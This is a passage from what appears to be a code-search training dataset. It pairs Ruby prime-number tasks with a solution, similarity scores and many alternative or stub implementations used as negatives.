"0.8286785",
"0.8267415",
"0.82589245",
"0.8240244",
"0.8226852",
"0.8226852",
"0.8226852",
"0.8225501",
"0.82200336",
"0.8201339",
"0.8196485",
"0.81954306",
"0.8194395",
"0.8187479",
"0.81857574",
"0.81767964",
"0.81707084",
"0.81670696",
"0.8165828",
"0.8143491",
"0.81394327",
"0.8136113",
"0.8134763",
"0.811536",
"0.8111239",
"0.81080866",
"0.8106419",
"0.8106143",
"0.80964607",
"0.8082479",
"0.80794656",
"0.8061252",
"0.80586964",
"0.8054272",
"0.80536664",
"0.80504465",
"0.804762",
"0.8043209",
"0.8043035",
"0.8039686",
"0.80396193",
"0.8039078",
"0.802733",
"0.8022002",
"0.8019988",
"0.8004364",
"0.8002243",
"0.79936755",
"0.7990133",
"0.79874593",
"0.7986634",
"0.79810566",
"0.7978015",
"0.797607",
"0.7975226",
"0.79748225",
"0.7973657",
"0.7972487",
"0.795931",
"0.79570824",
"0.79463726",
"0.7943668",
"0.79418004",
"0.79396486",
"0.7934559",
"0.7934559",
"0.79344285",
"0.79203117",
"0.7919308",
"0.7916845"
] |
0.0
|
-1
|
Write a method, is_prime?, that takes a number num and returns true if it is prime and false otherwise.
|
def is_prime?(num)
i = 2
while i < num
divisible = ((num % i) == 0)
if divisible
return false
end
i += 1
end
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def is_prime?(num)\nend",
"def is_prime?(num)\n\treturn false if (num < 1 || num.class == Float)\n\t(2...num).each { |n| return false if num % n == 0 }\n\ttrue\nend",
"def is_prime?(num)\n # Write your code here\nend",
"def is_prime?(num)\n\nend",
"def isPrime?(num)\n\treturn false if num <= 1\n\n\ti = 2\n\twhile i < num\n\t\treturn false if num % i == 0\n\t\ti += 1\n\tend\n\treturn true\nend",
"def is_prime?(num)\n\t\t return false if num <= 1\n\t\t maxfactor = Math.sqrt(num).to_i\n\t\t (2..maxfactor).each {|i| return false if num % i == 0}\n\t\t true\n\t\tend",
"def is_prime?(num)\n ('1' * num) !~ /^1?$|^(11+?)\\1+$/\n end",
"def is_prime?(num)\n\tfor i in 2..Math.sqrt(num)\n\t\tif num % i == 0\n\t\t\treturn false\n\t\tend\n\tend\n\treturn true\nend",
"def is_prime?(num)\n\tfor i in 2..Math.sqrt(num)\n\t\tif num % i == 0\n\t\t\treturn false\n\t\tend\n\tend\n\treturn true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).none? { |factor| num % factor == 0 }\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).none? { |factor| num % factor == 0 }\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).none? { |factor| num % factor == 0 }\nend",
"def is_prime?(num)\n\t(2..Math.sqrt(num)).each do |target|\n\t\treturn false if num % target == 0\n\tend\n\treturn true\nend",
"def is_prime?(num)\n return if num <= 1\n (2..Math.sqrt(num)).none? { |i| (num % i).zero? }\nend",
"def prime?(n)\n\tPrime.prime?(n)\nend",
"def is_prime?(num)\n return true if num == 1\n (2...num).all? {|i| (num % i) != 0}\nend",
"def is_prime?(number)\n\nend",
"def is_prime?(number)\n\nend",
"def prime?(num)\n\treturn false if num == 1\n\t(2...num).each { |n| return false if num % n == 0 }\n\ttrue\nend",
"def is_prime(num)\n\tif num <= 1\n\t\treturn false\n\tend\n\tfor x in 2..Math.sqrt(num).floor do\n\t\tif num % x == 0\n\t\t\treturn false\n\t\tend\n\tend\n\t#If not divisible by anything, return the default case true because the number\n\t#therefore is prime\n\treturn true\nend",
"def is_prime?(num)\n (2...num).none? { |div| num % div == 0 }\nend",
"def prime? num\n return false if num < 2\n (2..Math.sqrt(num)).none? {|n| num % n == 0 }\n end",
"def is_prime?(num)\n return false if num == 1\n return true if num == 2 \n (2..Math.sqrt(num)+1).each do |x|\n return false if num%x == 0\n end\n true\nend",
"def prime?(num)\n\treturn false if num < 2\n\t\n\t(2...num).each do |i|\n\t\treturn false if num % i == 0\n\tend\n\ttrue\nend",
"def is_prime?(num)\n return false if num <2\n return (2..num/2).none? {|i| num%i==0}\nend",
"def prime?( number )\n self.class.prime? number\n end",
"def is_prime?(num)\n 2.upto(num-1) do |i|\n return false if num%i==0\n end\n true\nend",
"def is_prime(x)\n return true if x.prime? == true\n else false\nend",
"def is_prime?(num)\n if !num.is_a?(Integer) || ( num.class == Float && !num.nan? && num == num.floor ) || num <= 1\n false\n else\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n true\n end\nend",
"def is_prime?(n)\n end",
"def is_prime?(num)\n 2.upto(num / 2) do |n|\n return false if num % n == 0\n end\n true\nend",
"def prime?(num)\n\t(2 .. Math.sqrt(num)).each {|i| return false if num % i == 0}\n\treturn true\nend",
"def is_prime?(num)\n\tif num > 1\n\t\t(2..(num-1)).each do |i|\n \t\t\tif num % i == 0\n \t\t\t\treturn false\n \t\t\tend\n\t\tend\n\t\ttrue\n\telse\n\t\tfalse\n\tend\nend",
"def is_prime?(num)\n (2...num).each do |i|\n return false if num % i == 0\n end\n true\nend",
"def is_prime?(num)\n\n return false if num<2\n\n (2...num).none? {|factor| num%factor == 0}\n\nend",
"def is_prime?(num)\n (2...num).none? { |el| num % el == 0 }\nend",
"def is_prime?(num)\n (2...num).none? { |n| num % n == 0 }\nend",
"def is_prime?(num)\n\n return false if num <= 1\n return true if num == 2\n\n i = 2\n while i < num\n return false if num % i == 0\n i += 1\n end\n\n true\n\nend",
"def is_prime?(num)\n for i in (2..Math.sqrt(num))\n return false if num % i == 0\n end\n true\nend",
"def is_prime?(num)\n\tif num > 1\n\t\tmaxn = num**(0.5)\n\t\ti = 2\n\t\twhile i <= maxn\n \t\t\tif num % i === 0\n \t\t\t\treturn false\n \t\t\tend\n \t\t\ti = i+2\n\t\tend\n\t\ttrue\n\telse\n\t\tfalse\n\tend\nend",
"def is_prime?(num)\n (2...num).each {|el| return false if num % el == 0}\n true\nend",
"def is_prime?(num)\n (2...num).none? {|i| num % i == 0}\nend",
"def prime?(num)\n\t(2..Math.sqrt(num)).each do |x|\n\t\tif num % x == 0\n\t\t\treturn false\n\t\tend\n\tend\n\ttrue\nend",
"def prime?(num)\n if 0 == num or 1 == num\n return false\n else\n return (2..Math.sqrt(num)).all? { |x| num % x != 0}\n end\nend",
"def prime?(num)\n Math.sqrt(num).to_i.downto(2).each { |i| return false if (num % i).zero? }\n true\nend",
"def is_prime?(num)\n (2..num/2).none?{|el| num % el == 0}\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each { |factor| return false if num % factor == 0}\n true\nend",
"def is_prime?\n return false if num <= 1\n Math.sqrt(num).to_i.downto(2).each {|i| return false if num % i == 0}\n true\nend",
"def prime?(num)\n\t(2..Math.sqrt(num)).each do |x|\n\t\tif num % x == 0\n\t\t\treturn false\n\t\tend\n\tend\n\treturn true\nend",
"def prime?(num)\n factors(num) == [1, num]\nend",
"def prime?(arg)\n Prime.prime?(arg)\nend",
"def is_prime?(num)\n (2...num).each do |el|\n return false if num % el == 0\n end\n true\nend",
"def prime?(int)\n \nend",
"def is_prime?(i)\r\n 2.upto(Math.sqrt(i).to_i) {|j|\r\n return false if i % j == 0\r\n }\r\n true\r\nend",
"def is_prime?(num)\n (2..num / 2).each do |n|\n return false if num % n == 0\n end\n true\nend",
"def is_prime?(num)\n (2...num).each do |factor|\n if num % factor == 0\n return false\n end\n end\n true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each do |i|\n return false if num%i == 0\n end\n return true\nend",
"def is_prime?(num)\n return false if num <= 1\n\n (2...num).each do |fact|\n return false if num % fact == 0\n end\n\n true\nend",
"def is_it_prime(num)\n \n\tif num == 100\n\t return \"This is not a prime number\"\n\telsif num <= 2 || num % num == 1 \n return \"This is not a prime number\"\n\telse\n return \"This is a prime number\"\n\tend \nend",
"def is_prime?(n)\n 2.upto(Math.sqrt(n).to_i) { |num| return false if n % num == 0 }\n n == 1 ? false : true\nend",
"def is_prime?(num)\n (2...num).each do |n|\n if num % n == 0\n return false\n end\n end\n true\nend",
"def ruby_prime(num)\n if num.prime? == true\n puts \"#{num} is prime.\"\n else puts \"#{num} is not prime.\"\n end\nend",
"def is_prime?(num)\n i = 2\n while i < num\n return false if num % i == 0\n i+=1\n end\n true\nend",
"def is_prime?(num)\n i = 2\n while i < num\n return false if num % i == 0\n i+=1\n end\n true\nend",
"def isprime?(num)\n\n return false if num<2\n\n (2...num).each do |factor|\n return false if num % factor == 0\n end\n\n return true\n\nend",
"def prime?(num)\n return false if num <= 1\n (2...num).none? { |i| num % i == 0 }\nend",
"def is_prime?(num)\n if !is_integer?(num)\n return false\n elsif num <= 1\n return false\n else\n (2..(num-1)).each do |el|\n if num % el == 0\n return false\n end\n end\n end\n return true\nend",
"def is_prime?(num)\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n num > 2\nend",
"def is_prime?(num)\n for i in (2...num/2)\n if num % i == 0\n return false\n end\n end\n return true\nend",
"def is_prime?(num)\n return 2 if num == 2\n (2...num).each do |n|\n return false if num % n == 0\n end\n true\nend",
"def is_prime?(num)\n (2..(num/2)).each { |divisor| return false if num % divisor == 0 }\n true\nend",
"def is_prime?(num)\n (2..(num - 1)).each do |divisor|\n return false if num % divisor == 0\n end\n\n true\nend",
"def is_prime?(num)\n (2..num-1).each do |x|\n return false if num % x == 0\n end\n true\nend",
"def is_prime?(num)\r\n (2..(num ** 0.5).to_i).each {|factor| return false if num % factor == 0 && num != factor} # no need to check above square root\r\n true\r\nend",
"def is_prime?(num)\n return true if num == 1 || num == 2\n return false if num % 2 == 0\n int = 3\n while int <= Math::sqrt(num)\n return false if num % int == 0\n int += 2\n end\n true\nend",
"def prime?\n Prime.prime?(self)\n end",
"def prime?(num) \n return false if num < 2\n (2...num).none? { |factor| num % factor == 0}\nend",
"def is_prime_number(num)\n (2...num).all? {|n| num % n != 0}# has factors\nend",
"def prime?(num)\r\n if num <= 1 || num == 0 || num == 1\r\n return false\r\n elsif \r\n (2..num - 1).each do |i| \r\n if num % i == 0 \r\n return false \r\n end \r\n end \r\n end \r\n true \r\n end",
"def is_prime?(num)\n return false if num.even?\n for i in (2..((num/2.round) + 1))\n return false if num % i == 0\n end\n return true\nend",
"def is_prime?(num)\n return false if num.even?\n for i in (2..((num/2.round) + 1))\n return false if num % i == 0\n end\n return true\nend",
"def prime?(num)\n return false if num < 2\n (2...num).none? { |fact| num % fact == 0 }\nend",
"def prime?(num)\n return false if num < 2\n (2...num).none? { |fact| num % fact == 0 }\nend",
"def is_prime?(num)\n Math.sqrt(num).floor.downto(2).each do |i|\n false if num % i == 0\n end\n true\nend",
"def is_prime?\r\n\t#Your code here\r\nend",
"def prime?(num)\n return false if num == 1\n return true if num == 2\n (2...num).each do |divisor|\n return false if num % divisor == 0\n end\n true\nend",
"def is_prime(num)\n return false if num <= 1\n Math.sqrt(num).to_i.downto(2).each {|i| return false if num % i == 0}\n return true\nend",
"def prime?(num)\n if num == 2\n true\n elsif num > 1 && num % num == 0 && num % 1 == 0 && !(2 .. (num - 1)).to_a.any?{|number| num % number == 0}\n true\n else\n false\n end\nend",
"def is_prime?(num)\n return false if num < 2\n \n (2...num).each do |i|\n return false if num % i == 0\n end\n true\nend",
"def prime?(num)\n\tif num < 2\n\t\treturn false\n\tend\n \n \t(2...num).each do |factor|\n \tif num % factor == 0\n \treturn false\n end\n end\n \n \treturn true\nend",
"def is_prime?(num)\n return false if num <= 1\n\n idx = 2\n while idx < num\n if num % idx == 0\n return false\n end\n idx += 1\n end\n\n true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n return true\nend",
"def is_prime?(num)\n return false if num < 2\n (2...num).each do |i|\n if num % i == 0\n return false\n end\n end\n return true\nend",
"def is_prime?(num)\n return false if num < 2\n\n (2...num).each do |i|\n return false if num % i == 0\n end\n true \nend",
"def isPrime(num)\n return false if num < 2\n\n sqrt_num = Math.sqrt(num).floor\n 2.upto(sqrt_num){|i|\n if num % i == 0\n return false # 割り切れたら素数でない\n end\n }\n return true\nend",
"def is_prime?(number)\r\n (2...number).each do |n|\r\n return false if number % n == 0\r\n end\r\n true\r\nend",
"def prime?(num)\n return false if num < 2\n (2...num).none? { |i| num % i == 0 }\nend",
"def is_prime(num)\n (2..num**0.5).each { |i| return false if num % i == 0 }\n true\nend",
"def is_prime(num)\n\tdivisor = 2\n\twhile divisor < num\n\t\tif num%divisor == 0\n\t\t\treturn false\n\t\tend\n\t\tdivisor += 1\n\tend\n\treturn true\nend",
"def is_prime?(number)\n remainders = (2...number).map { |d| number % d}\n !remainders.include?(0) && number > 1\nend",
"def prime?(num)\n return false if num == 1\n (2...num).each do |number|\n return false if num % number == 0\n end\n return true\nend"
] |
[
"0.8312177",
"0.8139957",
"0.8124352",
"0.81223184",
"0.80209494",
"0.79551506",
"0.79307765",
"0.79305464",
"0.79305464",
"0.79105973",
"0.79105973",
"0.79105973",
"0.78970796",
"0.7890389",
"0.7881669",
"0.7873143",
"0.7869361",
"0.7869361",
"0.78663236",
"0.785429",
"0.78449035",
"0.7834881",
"0.78160644",
"0.7810488",
"0.78102636",
"0.779848",
"0.77936715",
"0.77908933",
"0.7788586",
"0.77837455",
"0.77774704",
"0.77735406",
"0.777193",
"0.77662456",
"0.7763563",
"0.77611834",
"0.77562815",
"0.7752469",
"0.7752171",
"0.77501136",
"0.77456015",
"0.7742495",
"0.7736771",
"0.7727357",
"0.77272725",
"0.77271396",
"0.7723838",
"0.77157587",
"0.7714062",
"0.7710957",
"0.77086574",
"0.7705166",
"0.76778424",
"0.767051",
"0.7661802",
"0.7656798",
"0.76511586",
"0.7650099",
"0.76492745",
"0.76415217",
"0.7623114",
"0.76217455",
"0.7619046",
"0.7619046",
"0.7618185",
"0.76168364",
"0.7613472",
"0.76104856",
"0.76100796",
"0.7607234",
"0.76045877",
"0.76026106",
"0.75908",
"0.75872",
"0.7586252",
"0.7581753",
"0.7577654",
"0.7574202",
"0.75542736",
"0.75531805",
"0.75531805",
"0.7553104",
"0.7553104",
"0.7548622",
"0.7536669",
"0.75357413",
"0.7532435",
"0.7527415",
"0.75263965",
"0.7522764",
"0.7515699",
"0.75027055",
"0.7502592",
"0.7500298",
"0.7499518",
"0.74902105",
"0.7488516",
"0.748734",
"0.7486703",
"0.7486684",
"0.7485447"
] |
0.0
|
-1
|
Using your is_prime? method, write a new method, primes that takes a (nonnegative, integer) number max and returns an array of all prime numbers less than max.
|
def primes(max)
array = []
i = 2
while i < max.abs
if is_prime?(i)
array << i
end
i += 1
end
array
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def primes(max)\n primes = []\n number = 2\n \n while number <= max\n primes << number if is_prime? number\n number += 1\n end\n primes\nend",
"def primes(max)\n primes = []\n number = 2\n \n while number <= max\n primes << number if is_prime? number\n number += 1\n end\n primes\nend",
"def get_primes(limit)\n primes = []\n (2...limit).each do |number|\n primes << number if is_prime?(number)\n end\n primes\nend",
"def primes_less_than(num)\n arr = []\n (2...num).each do |el|\n if is_prime?(el)\n arr << el\n end\n end\n arr\nend",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\treturn primeTracker\nend",
"def primes_less_than(num)\n res = []\n (2...num).each do |i|\n res.push(i) if is_prime?(i) == true\n end\n res\nend",
"def GetPrimes (maximum)\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tnext if !primeTracker[i]\n\t\t\n\t\tstart = i + i\n\t\t\n\t\tfor j in (start...maximum).step(i)\n\t\t\tprimeTracker[j] = false;\n\t\tend\n\tend\n\t\n\tprimes = []\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tprimes.push(k) if primeTracker[k]\n\tend\n\t\n\treturn primes\nend",
"def get_primes num\n primes = []\n for i in 0 ... num do\n if check_prime?(i) == true\n primes.push(i)\n end\n end\n p primes\nend",
"def getPrimes()\n oldlimit = $primelimit + 1\n $primelimit *= 2\n\n for i in oldlimit...$primelimit\n isPrime = true\n $primes.each do |p|\n if i % p == 0\n isPrime = false\n break\n end\n end\n if isPrime\n $primes << i\n end\n end\n\nend",
"def primes_up_to(max)\n repository = (0..max).collect{true} #=> Create flag array\n limit = (max ** 0.5) #=> establish search limit\n\n for index in 2..limit #=> search through flag aray\n next if !repository[index]\n num = (index * 2)\n while num <= max #=> unflag multiples of primes\n repository[num] = false\n num += index\n end\n end\n\n # => convert numbers into arrays\n primes = repository.collect.with_index do |flag, value|\n value if flag\n end\n\n # return cleaned array\n primes.shift\n primes.shift\n primes.compact\nend",
"def primes(num)\n\twhole_array = (2..num).to_a\n\tprime_array = [whole_array.shift]\n\n\tuntil whole_array == []\n\t\twhole_array.delete_if { |x| x % prime_array.last == 0 }\n\t\tprime_array << whole_array.shift\n\tend\n\tprime_array\nend",
"def primes\n return [] if max_prime < 2\n\n candidates.each do |prime,_|\n # skip numbers we already know NOT to be prime (from previous iterations)\n next if candidates[prime] != :prime\n\n # find the prime number candidates greater than the current prime number\n candidates.select { |n,_| candidates[n].eql?(:prime) && n > prime }\n .each do |num,_|\n # mark numbers evenly divisible by the current prime as NOT PRIME\n @candidates[num] = :not_prime if (num % prime) == 0\n end\n end\n\n # convert numbers still marked as prime to an array of numbers\n candidates.map { |num,value| num if value.eql? :prime }.compact\n end",
"def primes_less_than (num)\n arr=[]\n for n in 2..(num-1)\n if is_prime?(n)\n arr.push(n)\n end\n end\n p arr\n return arr\nend",
"def primes_below(n)\n a = 2\n output_array = []\n while a < n\n if is_prime?(a)\n output_array.push(a)\n end\n a = a + 1\n end\n return output_array\nend",
"def get_primes limit\n\tnums = (1...limit).select { |n| n.prime? }\n\n\tp nums\nend",
"def get_primes\n j = 0\n\n while j < @limit \n prime_number = is_prime\n if prime_number\n @prime_numbers.push(prime_number)\n j += 1\n end\n @count += 1\n end\n\n return @prime_numbers\n end",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tif (primeTracker[k] == true)\n\t\t\tprimes.push(k)\n\t\tend\n\tend\n\t\n\treturn primes\nend",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tif (primeTracker[k] == true)\n\t\t\tprimes.push(k)\n\t\tend\n\tend\n\t\n\treturn primes\nend",
"def GetPrimes (maximum)\n\t# Clear the input vector in case there is existing data\n\tprimes = []\n\t\n\t# There are no primes less than 2\n\tif (maximum < 2)\n\t\treturn\n\tend\n\t\n\t# Construct and execute the Sieve\n\tsqrtMaximum = Math.sqrt(maximum).to_i\n\tprimeTracker = Array.new(maximum,true)\n\t\n\tfor i in 2...sqrtMaximum\n\t\tif (!primeTracker[i])\n\t\t\tnext\n\t\tend\n\t\t\n\t\tfor j in ((i+i)...maximum).step(i)\n\t\t\tif (j < 0) # Guard against integer overflow\n\t\t\t\tbreak\n\t\t\tend\n\t\t\t\n\t\t\tprimeTracker[j] = false\n\t\tend\n\tend\n\t\n\t# Generate the list of primes to return\n\tfor k in 2...maximum\n\t\tif (primeTracker[k] == true)\n\t\t\tprimes.push(k)\n\t\tend\n\tend\n\t\n\treturn primes\nend",
"def primes\n range = (min..max).to_a\n primes = (min..max).to_a\n\n range.each do |mod|\n primes.delete_if do |num| \n composite?(num, mod) unless num == mod\n end\n range = primes\n end\n primes\n end",
"def prime(max)\n (1..max).select { |x| (1..max).count { |y| x % y == 0 } == 2 }\nend",
"def primes\n\t\t# primes = []\n\t\t# primes << 2\n\t\tprimes = [2] # combined previous two lines\n\t\tx = 3\n\n\t\tloop do\n\t\t\tbreak if primes.length == @n_primes # End loop when desired number has been calculated\n\t\t# while primes.length < @n_primes # Alternative 1 to loop do, break\n\t\t# until primes.length == @n_primes # Alternative 2 to loop do, break\n\t\t\ty = 3\n\t\t\ty += 2 until x % y == 0 # Loop to test if x is divisible by any odd number below it, y\n\t\t\tprimes << x if x == y # If the (odd) number was not divisible by any (odd) below itself, it is a prime\n\t\t\tx += 2\n\t\tend\n\n\t\treturn primes\n\tend",
"def get_primes(upper_bound)\n primes = []\n (2..upper_bound).each do |potential_prime|\n is_prime = true #default to true if the below loop doesn't prove it false\n (2..(potential_prime - 1)).each do |divisor| #we start from 2 because that is the first number\n #that we know is not prime - 1 is there so we don't divide the number by itself because\n #we know that it is possible\n if potential_prime % divisor == 0\n is_prime = false\n break\n end\n end\n\n #HERE - we know if is_prime is true, it must be prime\n if is_prime\n primes << potential_prime #this is how you get all the numbers to the max number\n end\nend\n\n return primes\nend",
"def prime_numbers(range)\n ar = range.to_a\n ar2 = [nil, nil] + [true] * ar.size\n\n i = 2\n while i <= Math.sqrt(ar.max).to_i\n if ar2[i]\n z = i * i\n while z <= ar.max\n ar2[z] = false\n z += i\n end\n end\n i += 1\n end\n ar.delete_if { |e| ar2[e] == nil || ar2[e] == false }\nend",
"def prime(number)\n prime_numbers = []\n (2..number).each do |current_number|\n if is_prime? current_number\n prime_numbers << current_number\n end\n end\n return prime_numbers\nend",
"def pretentious_primes(arr, num)\n new_arr = []\n if num > 0\n arr.each do |ele|\n i = ele + 1\n count = 0\n while true\n if is_prime?(i)\n count += 1\n end\n if count == num\n new_arr << i\n break\n end\n i += 1\n end\n end\n else\n num = -1 * num\n end\n new_arr\nend",
"def all_primes(number)\n primes = []\n (2...number).each do |num|\n if prime?(num)\n primes << num \n end\n end\n primes\nend",
"def primes_less_than(num)\n require 'prime'\n arr = []\n Prime.each(num) do |prime| arr.push(prime)\n end\n num.prime? ? arr.pop : arr\n return arr\n end",
"def largest_prime(num)\n\tresult = []\n\ti = 2\n\twhile i <= num\n\t\tif is_prime?(i)\n\t\t\tif num % i == 0 # Check for whole number if % by i \n\t\t\t\tnum = num / i # Update the num\n\t\t\t\tresult << i # Add i to the array\n\t\t\t\ti = 2 # Reset i to 2\t\n\t\t\tend\t\n\t\tend\n\t\ti += 1\t\n\tend\n\tresult\nend",
"def primes (n)\n return (1..n).select { |x| x.prime? }\nend",
"def primes\n return [] if self == 0\n return \"don't do that\" if self < 0\n list = [2]\n test = 3\n until list.length == self\n list << test if test.is_prime?\n test += 2\n end\n list\n end",
"def prime (n)\n\n\t#create an Array\n\tprime_num = []\n\n\tfor num in (2..n)\n\t\tis_prime = factors(num)\n\t\tif (is_prime.length ==2)\n\t\t\tprime_num.push(num)\n\t\tend\n\tend\n\treturn prime_num\nend",
"def primes(max)\n yield \"See Primes below: \"\n parray= []\n Prime.each(max) do |p|\n parray << p\n end\n print parray\nend",
"def anti_prime?(num)\n max = 0\n sum_i_array = []\n (1..num).each do |n|\n sum_i = 0\n (1..n).each { |i| sum_i += 1 if n % i == 0 }\n sum_i_array << sum_i\n end\n sum_i_array[-1] == sum_i_array.max\nend",
"def primes_less_than(num)\n\toutput = []\n\t(2...num).each do |n|\n\t\toutput << n if is_prime?(n)\n\tend\n\toutput\nend",
"def primes()\n return [] if @number < 2\n # build Boolean array to use for sieve with buffer to align indices\n sieve_array = Array.new(2, false) + Array.new(@number-1, true)\n # perform Sieve of Eratosthenes eliminations\n (2..Math.sqrt(@number).to_i).each do |i|\n (i**2..@number).step(i) {|j| sieve_array[j] = false} if sieve_array[i] == true\n end\n # return numbers by corresponding index that are still true\n (2..@number).collect {|index| index if sieve_array[index] == true}.compact\n end",
"def find_primes(num,prime_array=[])\n i = 2\n until num % i == 0 \n i += 1\n end\n prime_array << i\n return prime_array if num == i\n find_primes(num/i, prime_array) \nend",
"def pretentious_primes(arr, num)\nend",
"def sieve(n)\n # initialize an empty array (this will store all primes between 2 and n)\n prime_array = []\n for i in 2..n\n if(is_prime(i))\n # if 'i' is a prime number, add it to the array\n prime_array.push(i)\n end\n end\n # finally, we'll return our array of prime numbers\n return prime_array\nend",
"def primes(n) \n max = Math::sqrt(n).truncate\n (2..max).each {|val|\n if n % val == 0 then\n p val\n primes(n/val)\n return\n elsif val == max then\n p n\n return\n end\n }\nend",
"def find_prime_numbers(num)\n\tarr =[]\n (2..num).each{|x| arr.push(x)}\n\n i = 0\n p = arr[i]\n\n while p != arr[-1]\n\t arr.delete_if{|n| n%p == 0 && n != p}\n\t i+= 1\n\t p = arr[i]\n end\n return arr\nend",
"def prime_list(number_of_primes)\n return [] if number_of_primes < 1\n prime_numbers = Array.new\n for num in 2..9999999 do\n if is_prime_num(num, prime_numbers)\n prime_numbers.push(num)\n break if prime_numbers.length == number_of_primes\n end\n end\n return prime_numbers\n end",
"def compute_primes\n nums = (@max_checked..@max_checked * 2).map { |x| x.odd? ? x : nil }.to_a\n 1.upto(@primes.index { |p| p * p > @max_checked * 2 }) do |i|\n start_idx = -@max_checked % @primes[i] # prime[i]'s 1st multiple's index\n\n (start_idx..nums.size).step(@primes[i]) { |x| nums[x] = nil }\n end\n @max_checked *= 2\n @primes += nums.compact\n end",
"def primes (n)\r\n primes = Array.new(n) { |index| index+=1 }\r\n return primes.select { |x| factors(x).length == 2 }\r\nend",
"def prime_number(n)\n res = []\n prime = Array.new(n + 1, true)\n (2..n).each do |x|\n num = x * x\n break if num > n\n\n if prime[x]\n (num..n).step(x).each do |multiples|\n prime[multiples] = false\n end\n end\n end\n \n (2..n).each do |primes|\n res << primes if prime[primes]\n end\n res\nend",
"def find_primes(input)\n\t\n\tprimes = Array.new\n\t\n\tlimit = Math.sqrt(input)\n\t\n\tnumber_to_test = 2\n\t\n\tif number_to_test > limit\n\t\treturn Array[input]\n\tend\n\t\n\twhile input % number_to_test != 0 && number_to_test < limit\n\t\tnumber_to_test += 1\n\tend\n\t\n\tif input % number_to_test == 0\n\t\treturn find_primes(number_to_test) + find_primes(input/number_to_test)\n\tend\n\n\treturn Array[input]\n\t\t\nend",
"def find_primes(input)\n\t\n\tprimes = Array.new\n\t\n\tlimit = Math.sqrt(input)\n\t\n\tnumber_to_test = 2\n\t\n\tif number_to_test > limit\n\t\treturn Array[input]\n\tend\n\t\n\twhile input % number_to_test != 0 && number_to_test < limit\n\t\tnumber_to_test += 1\n\tend\n\t\n\tif input % number_to_test == 0\n\t\treturn find_primes(number_to_test) + find_primes(input/number_to_test)\n\tend\n\n\treturn Array[input]\n\t\t\nend",
"def ruby_prime(n1, n2)\n prime_numbers = []\n (n1..n2).each do |num|\n if Prime.prime?(num)\n prime_numbers << num\n end\n end\n prime_numbers\nend",
"def primes\n arr=Array.new\n arr[1]=false\n (2..1000).each {|i| arr[i]=true}\n (2..1000).each {|i| (i/2).floor\n (2..1000).each {|j| (j/i).floor\n arr[i*j] = false\n }}\n for i in 1..1000\n if arr[i] == true\n puts i\n end\n end\nend",
"def primes (number)\n primes_array = []\n Prime.each(number) do |p|\n primes_array.push(p)\n end\n\n primes_array\nend",
"def prime_num_gen( array_size )\n\n # array_size == array.length\n\n array = []\n\n divisors = []\n\n i = 0\n while( array_size != array.length )\n\n # p i\n\n if( i >= 2 ) # 0 and 1 are not prime\n\n if( i == 2 ) # two is a prime\n # p \" 2 is pushed\"\n array.push(i)\n end\n\n if( i % 2 != 0 ) # prime numbers cannot be even\n\n # p \" i #{i}\"\n # p \" divisors #{divisors}\"\n\n # START extra check - if i has more than 2 divisors\n #\n # IMPROVEMENT!!!!\n #\n # Could have simply called is_prime?( i ) --> returns true if prime\n # if is_prime? ? array.push(i) : p \"do nothing\"\n #\n j = 1\n while( i >= j )\n\n #p \" j #{j}\"\n\n if( i % j == 0)\n\n divisors.push(j)\n # p \" divisors #{divisors}\"\n end #if\n\n j += 1\n end # while\n\n if( divisors.length == 2 ) # prime should have 1 and itself as divisors\n array.push(i)\n # p \"#{i} is pushed\"\n end\n\n divisors.clear\n # p divisors\n\n # END of extra check\n #\n # extra check - if i has more than 2 divisors\n\n end # if (prime numbers cannot be 